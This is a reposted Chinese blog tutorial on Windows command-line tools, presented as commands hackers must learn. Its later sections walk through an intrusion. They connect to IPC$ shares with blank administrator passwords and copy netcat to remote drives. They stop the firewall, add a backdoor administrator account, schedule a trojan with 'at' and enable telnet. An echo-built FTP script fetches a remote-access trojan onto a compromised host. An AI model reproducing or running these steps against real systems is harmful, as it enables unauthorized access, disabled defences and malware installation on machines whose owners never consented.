黑客必學的DOS指令

黑客必學的DOS指令

一、DOS基本指令：

1、md——建立子目錄 

2、cd——改變目前目錄

3、del——删除檔案指令

4、rd——删除子目錄指令

5、dir——顯示磁盤目錄指令

6、copy檔案複制指令

7、xcopy——目錄複制指令

8、type——顯示檔案内容指令

9、ren——檔案改名指令

10、fc——檔案比較指令

11、attrib——修改檔案屬性指令

12、其它指令

13、cls——清螢幕指令

14、ver 檢視系統版本号指令

二、DOS常用的指令：

1、ipconfig /all   

   顯示所有網絡擴充卡（網卡、撥接上網等）的完整TCP/IP配置資訊。與不帶參數的用法相比，它的資訊更全更多，如IP是 否  動态配置設定、顯示網卡的實體位址等。

2、ping

   用來檢查網絡是否通暢或者網絡連接配接速度的指令。我們隻掌握一些基本的很有用的參數就可以了（下同）。

　　-t 表示将不間斷向目标IP發送資料包，直到我們強迫其停止。Ctrl+c停止。

　　-l 定義發送資料包的大小，預設為32位元組，我們利用它可以最大定義到65500位元組。

　　-n 定義向目标IP發送資料包的次數，預設為4次。　 

　舉個例子來說明一下具體用法。 　　 

    c:\>ping www.baidu.com

        Reply from 192.168.174.1: bytes=100 time<1ms TTL=128 　

      bytes=100 就是資料包的大小

      這裡time<1ms表示從發出資料包到接受到傳回資料包所用的時間是小于1毫秒。

      從TTL的傳回值可以初步判斷被ping主機的作業系統。 

　　（小知識：如果TTL=128左右，則表示目标主機可能是Win2000或xp或路由器；如果TTL=250，則目标主機可能是Unix，也有可能是路由器，TTL=64,目标主機可能是linux,大家自己測試一下，多了就熟悉了）。不過現在很多伺服器都過濾的ping的資料包，是以有很多ping不通的情況，可能是防火牆過濾ping的資料包。

3、netstat 

　　這是一個用來檢視網絡狀态的指令，操作簡便功能強大。 　　 

　　-a 檢視本地機器的所有開放端口，可以有效發現和預防木馬，可以知道機器所開的服務等資訊，為了防止被發現是以現在很多木馬都采用了隐藏程序和端口的技術。 　　 

　　-n 列出目前的開放端口，可以知道目前機器所開的服務資訊。

   netstat -na |find "3389"   檢視目前主機有沒有開放3389端口

4、tracert 

　　跟蹤路由資訊，使用此指令可以查出資料從本地機器傳輸到目标主機所經過的所有途徑，這對我們了解網絡布局和結構很有幫助。用法：tracert IP。 　　 

隻有一跳，就是本機，可以tracert百度試試

5、net 　（重點）　 

　　這個指令是網絡指令中最重要的一個，必須透徹掌握它的每一個子指令的用法，因為它的功能實在是太強大了，這簡直就是 微軟為我們提供的最好的入侵工具。首先讓我們來看一看它都有那些子指令，鍵入net /?回車。 

　　在這裡，我們重點掌握幾個入侵常用的子指令。 　　 

1)、net view 　　 

　　使用此指令檢視遠端主機的是以共享資源。指令格式為net view \IP。

可以看到的隻是我們先前共享的檔案夾，而如果C槽共享的話是看不到的。　

2)、net share 

     此指令用來檢視本地開啟的共享 ，也可共享指定盤符。

     net share c$=c:\     将C槽共享

     net share c$ /del    删除C：共享 

3)、net use 

把遠端主機的某個共享資源影射為本地盤符，圖形界面友善使用

net use \\ip\ipc$       建立IPC空連結 （隻是說明遠端主機開放135端口并共享ipc）

net use \\ip\ipc$  “密碼”  /user:使用者名    建立IPC非空連結 （獲得主機的使用者名和密碼）

示例：

net use \\192.168.174.129\ipc$ “” /user:administrator    ""表示密碼為空 

net use z: \\ip\c$   登陸後映射對方C：到本地為z: （2000可以直接使用，xp需要開對方共享）

應用：

建立了IPC$連接配接後，對方有開共享的話，就可以上傳檔案了：

copy nc.exe \192.168.174.128\c$，或copy c:\nc.exe \192.168.174.128\c$

表示把本地目錄下的nc.exe傳到遠端主機C槽，結合後面要介紹到的其他DOS指令就可以實作入侵了。

net use z: /del      删除映射對方到本地的為z:的映射 

net use * /del    删除所有連接配接

　　

4)、net start 

　　使用它來啟動遠端主機上的服務。當你和遠端主機建立連接配接後，如果發現它的什麼服務沒有啟動，而你又想利用此服務怎麼辦？就使用這個指令來啟動吧。用法：net start  服務名　

        開啟服務；(如:net start telnet， net start schedule，前提是服務未禁用。遺憾的是這兩常用的指令預設情況下都是禁用的。要用到另外的指令了，後面我們會講到) 

這裡以系統防火牆為例：net start sharedaccess

5)、net stop 

　　入侵後發現遠端主機的某個服務礙手礙腳，怎麼辦？利用這個指令停掉就ok了，用法和net start同。

    如 　net stop sharedaccess  關掉系統防火牆　 

6)、net user 

　　檢視和帳戶有關的情況，包括建立帳戶、删除帳戶、檢視特定帳戶、激活帳戶、帳戶禁用等。這對我們入侵是很有利的，最重要的，它為我們克隆帳戶提供了前提。鍵入不帶參數的net user，可以檢視所有使用者，包括已經禁用的。 

net user 賬戶  可以檢視相應賬戶的資訊

7)、net localgroup ：

　　檢視所有和使用者組有關的資訊和進行相關操作。鍵入不帶參數的net localgroup即列出目前所有的使用者組。在入侵過程中，我們一般利用它來把某個帳戶提升為administrator組帳戶，這樣我們利用這個帳戶就可以控制整個遠端主機了。

  用法：net localgroup groupname username /add。其中administrators組的權限最大

  示例：

  net user huayu 123  /add 建立一個使用者名為huayu密碼為123的賬戶

  net localgroup administrators huayu /add    把“huayu”添加到管理者中使其具有管理者權限,注意：administrator後加s用複數

  net user      檢視有哪些使用者 

  net user longyu     檢視帳戶的屬性 

  net user longyu /del  删掉使用者longyu，這裡不用輸密碼了

　

8)、net time 

      這個指令可以檢視遠端主機目前的時間。如果你的目标隻是進入到遠端主機裡面，那麼也許就用不到這個指令了。但簡單的入侵成功了，難道隻是看看嗎？我們需要進一步滲透。這就連遠端主機目前的時間都需要知道，因為利用時間和其他手段（後面會講到）可以實作某個指令和程式的定時啟動，為我們進一步入侵打好基礎。

用法：net time \IP。

   net time \\127.0.0.1      檢視本地主機時間

   net time \\192.168.1.1    檢視遠端主機時間

6、at 　　 

　　這個指令的作用是安排在特定日期或時間執行某個特定的指令和程式（知道net time的重要了吧？），而且這個指令是系統權限的，可以用來解除系統資料庫的一個限制，後面的執行個體中會用到。當我們知道了遠端主機的目前時間，就可以利用此指令讓其在以後的某個時間（比如2分鐘後）執行某個程式和指令。

   用法：

       at \\computer  time command 

   例如:

       at  \\192.168.174.129 12:12 c:\huayu.exe   建立ipc連接配接後才能執行，longyu.exe是我們傳到對方c盤點木馬 

       at  /delete 删除某個已排定進度的指令。

       at  /yes 用于删除所有作業，且不想在運作删除時顯示确認資訊 。

7、telnet （重點）

　　功能強大的遠端登陸指令，幾乎所有的入侵者都喜歡用它，屢試不爽。為什麼？它操作簡單，如同使用自己的機器一樣，隻要你熟悉DOS指令，在成功以administrator身份連接配接了遠端機器後，就可以用它來幹你想幹的一切了。下面介紹一下使用方法，首先鍵入telnet回車，再鍵入help檢視其幫助資訊。 

　　然後在提示符下鍵入telnet IP回車，這時就出現了登陸視窗（當然前提是telnet服務是開啟的，後面會講到如何開啟），讓你輸入合法的使用者名和密碼，這裡輸入任何密碼都是不顯示的。

　　當輸入使用者名和密碼都正确後就成功建立了telnet連接配接，這時候你就在遠端主機上具有了和此使用者一樣的權限，利用DOS指令就可以實作你想幹的事情了。

telnet還可以用來探測伺服器的類型，比如對方開了80端口，我們可以用telnet IP 80 通過傳回資訊判斷對方系統類型。

　 　　 

8、ftp 　　 

　　連接配接ftp伺服器，可以從FTP伺服器上傳和下載下傳檔案。

用法：在DOS指令行：

    ftp 192.168.174.1 會提示輸入使用者名和密碼登入FTP伺服器，登入成功可以執行以下指令

　　 

    用？檢視幫助

　　dir 跟DOS指令一樣，用于檢視FTP伺服器的檔案和目錄。

　　cd 進入某個檔案夾。

　　get 下載下傳檔案到本地機器。 如：get longyu.txt c:\longyu.txt 

　　put 上傳檔案到遠端伺服器。如：put c:\longyu.txt   前提有上傳的權限

　　delete 删除遠端ftp伺服器上的檔案。這也必須保證你有可寫的權限。 

　　bye 退出目前連接配接。 

　　quit 同上。 

   FTP指令主要還是用來傳送檔案的，比如木馬或是一些在殭屍電腦上可用的工具，如果手動上傳的話有點麻煩，我們可以建一個  記事本直接用指令運作，會省很多時間，一會舉個例子。

9、echo指令

   echo指令主要功能簡單點說就是開啟或關閉批處理指令行顯示在螢幕上 ，它是批處理檔案的指令，也屬于内部指令,内部指令就是常駐于記憶體的指令 在任意路徑下輸入均執行 

   echo指令的目的有兩個:

    1）.避免不需要的指令顯示來幹擾螢幕

    2）.在螢幕上給使用者顯示提示資訊 

用不帶參數的echo指令 則顯示目前的echo狀态資訊 

 echo+ 可以利用該指令在顯示中跳過一行,在建批處理指令中有實際上的意義。

 echo off/on  回顯的打開或關閉

例如：

@echo off

echo+

echo 華育國際歡迎你

pause  （就是一個暫停，出現這句話：請按任意鍵繼續. . .）

echo指令的使用

1． 作為控制批處理指令在執行時是否顯示指令行自身的開關 

    格式：echo [ on | off ]

2． 顯示目前echo設定狀态 

    格式：echo

3． 輸出提示資訊 

    格式：echo 資訊内容

4． 建立新檔案或增加檔案内容 

    格式：

      echo 檔案内容＞檔案名  寫入，如果原檔案有内容則覆寫

      echo 檔案内容＞＞檔案名  追加，如果原檔案有内容則追加在後面

      echo [message]>[file name] 這個指令是把指定的字元串送到指定的檔案中

    注意說明:

    “>>”将把内容将填加到檔案原檔案的末尾，“>”将原檔案内容覆寫

    (如果沒有指定檔案名則自動建立)

5.  我們就簡單示範下用ftp和echo指令傳送檔案  

    利用FTP方式傳輸檔案，這樣比較穩定。拿到對方shell後不可能像本機那樣一條指令一條指令的進行FTP操作。可以把所有有關的FTP指令先用echo寫到一個檔案裡(比如ftp.txt)然後用ftp -s:ftp.txt來執行ftp下載下傳檔案。就用虛拟機當作殭屍電腦了。

架設一台FTP伺服器，設定FTP使用者和密碼，并在此使用者目錄下放配置好的木馬程式。

ftp.txt檔案的内容：

用echo在cmd shell裡寫ftp.txt檔案的相應指令為 ：

echo open 192.168.1.1>>ftp.txt

echo huayu>>ftp.txt

echo 123456>>ftp.txt

echo binary>>ftp.txt

echo get nc.exe>>ftp.txt

echo bye>>ftp.txt

最後執行指令：

ftp -s:ftp.txt

說明如下：

open 192.168.1.1  FTP伺服器 

huayu ftp的使用者名 

123456  ftp的使用者密碼 

binary 傳輸模式設為二進制傳輸 （也可以不用）

get nc.exe 下載下傳FTP伺服器的鴿子服務端程式 

bye  退出

ftp -s:ftp.txt   執行FTP下載下傳木馬

10、sc指令

  sc config tlntsvr  start= auto  把telnet服務啟動類型改為自動

  net start tlntsvr   啟動Telnet服務

本文轉自成功不僅是個人榮譽，更是對家人責任部落格51CTO部落格，原文連結http://blog.51cto.com/hukunlin/227692如需轉載請自行聯系原作者

kunlin_hu